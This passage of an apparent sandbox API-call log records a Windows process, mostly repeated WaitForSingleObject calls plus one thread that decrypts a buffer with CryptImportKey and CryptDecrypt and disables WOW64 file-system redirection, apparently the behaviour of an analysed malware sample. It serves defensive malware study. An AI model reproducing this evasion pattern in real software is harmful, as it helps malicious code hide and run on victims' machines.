dwMilliseconds=0xffffffff) returned 0x0 [0140.173] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.173] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.173] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.173] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.174] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.174] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.174] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.174] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.174] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.174] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.174] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.174] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.174] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.174] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.174] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.174] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.174] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.175] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.175] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.175] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.175] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.175] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.175] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.175] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.175] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.175] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.175] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.175] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.175] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.175] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.176] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.176] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.176] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.176] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.176] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.176] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.176] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.176] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.176] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.176] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.176] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.176] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.176] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.177] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.177] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.177] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.177] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.177] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.177] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.177] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.177] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.177] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.177] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.177] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.177] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.178] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.178] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.178] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.178] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.178] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.178] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.178] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.178] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.178] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.178] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.178] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.178] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.178] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.179] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.179] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.179] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.179] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.179] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.179] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.179] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.179] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.179] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.179] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.179] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.179] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.180] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.180] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.180] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.180] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.180] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.180] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.180] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.180] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.180] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.180] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.180] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.180] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.180] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.181] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.181] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.181] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.181] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.181] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.181] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.181] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.181] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.181] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.181] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.181] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.181] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.181] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.182] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.182] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.182] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.182] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.182] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.182] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.182] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.182] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.182] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 Thread: id = 120 os_tid = 0xfe8 [0140.206] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10000) returned 0x39d0048 [0140.207] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10000) returned 0x39e0050 [0140.207] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x28) returned 0x26a9d10 [0140.207] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x110102) returned 0x3bdb020 [0140.210] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x50) returned 0x26a9d40 [0140.210] CryptImportKey (in: hProv=0xa968b8, pbData=0x366fe30, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x366fe98 | out: phKey=0x366fe98*=0xaa9610) returned 1 [0140.210] CryptSetKeyParam (hKey=0xaa9610, dwParam=0x1, pbData=0x366fe80, dwFlags=0x0) returned 1 [0140.210] CryptDecrypt (in: hKey=0xaa9610, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9d40, pdwDataLen=0x366fe4c | out: pbData=0x26a9d40, pdwDataLen=0x366fe4c) returned 1 [0140.210] CryptDestroyKey (hKey=0xaa9610) returned 1 [0140.210] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74440000 [0140.211] GetProcAddress (hModule=0x74440000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74456b30 [0140.211] Wow64DisableWow64FsRedirection (in: OldValue=0x366fee8 | out: OldValue=0x366fee8*=0x0) returned 1 [0140.211] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d40 | out: hHeap=0x26a0000) returned 1 [0140.211] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.211] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.211] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.211] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.211] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.211] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.211] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.211] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.211] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.211] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.212] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.212] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.212] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.212] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.212] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.212] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.212] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.212] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.212] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.212] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.212] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.212] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.213] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.213] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.213] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.213] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.213] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.213] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.213] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.213] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.213] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.213] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.213] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.213] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.214] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.214] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.214] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.214] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.214] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.214] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.214] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.214] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.214] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.214] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.214] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.214] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.215] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.215] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.215] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.215] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.215] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.215] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.215] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.215] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.215] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.215] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.215] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.215] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.216] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.216] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.216] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.216] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.216] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.216] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.216] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.216] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.216] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.216] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.216] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.216] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.216] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.217] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.217] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.217] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.217] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.217] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.217] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.217] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.217] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.217] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.217] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.217] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.217] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.218] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.218] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.218] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.218] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.218] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.218] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.218] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.218] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.218] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.218] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.218] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.218] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.219] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.219] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.219] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.219] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.219] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.219] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.219] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.219] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.219] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.219] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.219] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.219] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.219] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.220] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.220] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.220] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.220] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.220] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.220] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.220] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.220] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.220] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.220] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.220] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.221] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.221] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.221] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.221] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.221] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.221] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.221] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.221] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.221] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.221] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.221] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.221] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.221] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.222] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.222] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.222] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.222] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.222] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.222] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.222] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.222] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.222] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.222] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.222] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.222] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.223] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.223] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.223] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.223] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.223] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.223] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.223] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.223] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.223] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.223] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.223] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.223] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.224] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.224] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.224] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.224] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.224] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.224] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.224] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.224] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.224] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.224] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.224] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.224] WaitForSingleObject 